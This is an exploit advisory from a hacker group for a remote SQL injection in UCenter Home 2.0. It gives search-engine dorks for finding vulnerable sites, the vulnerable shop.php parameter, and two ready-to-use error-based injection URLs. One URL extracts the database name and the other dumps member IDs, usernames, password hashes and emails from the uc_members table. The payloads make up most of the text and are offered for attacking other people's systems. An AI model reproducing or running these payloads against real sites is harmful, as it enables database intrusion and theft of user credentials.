__--==UCenter Home 2.0 -(0day) Remote SQL Injection Vulnerability==--__
*/ Author : KnocKout
*/ Greatz : DaiMon,BARCOD3,RiskY and iranian hackers
*/ Contact: knockoutr@msn.com
*/ Cyber-Warrior.org/CWKnocKout

__--==__--==__--==__--==__--==__--==__--==__--==__--==__--==
Script : UCenter Home
Version : 2.0
Script HomePage : http://u.discuz.net/

__--==__--==__--==__--==__--==__--==__--==__--==__--==__--==
Dork : Powered by UCenter inurl:shop.php?ac=view
Dork 2 : inurl:shop.php?ac=view&shopid=

__--==__--==__--==__--==__--==__--==__--==__--==__--==__--==
Vuln file : Shop.php
Values : (?)ac=view&shopid=
Vulnerable Style : SQL Injection (MySQL Error Based)
Needed Materials : Hex Conversion

__--==__--==__--==__--==__--==__--==__--==__--==__--==__--==
You need the victim database name.

for Inject : http://server/shop.php?ac=view&shopid=253 and(select 1 from(select count(*),concat((select (select concat(0x7e,0x27,unhex(hex(database())),0x27,0x7e)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1

..
DB : Okey.
Edit the DB name : `[TARGET DB NAME]`

Example : 'hiwir1_ucenter'
Edit : Okey.
Use hex conversion and edit your SQL injection exploit.

Exploit Code : http://server/shop.php?ac=view&shopid=253 253 and(select 1 from(select count(*),concat((select (select (SELECT concat(0x7e,0x27,cast(concat(uc_members.uid,0x3a,uc_members.username,0x3a,uc_members.password,0x3a,uc_members.email) as char),0x27,0x7e) FROM `hiwir1_ucenter`.uc_members LIMIT 0,1) ) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1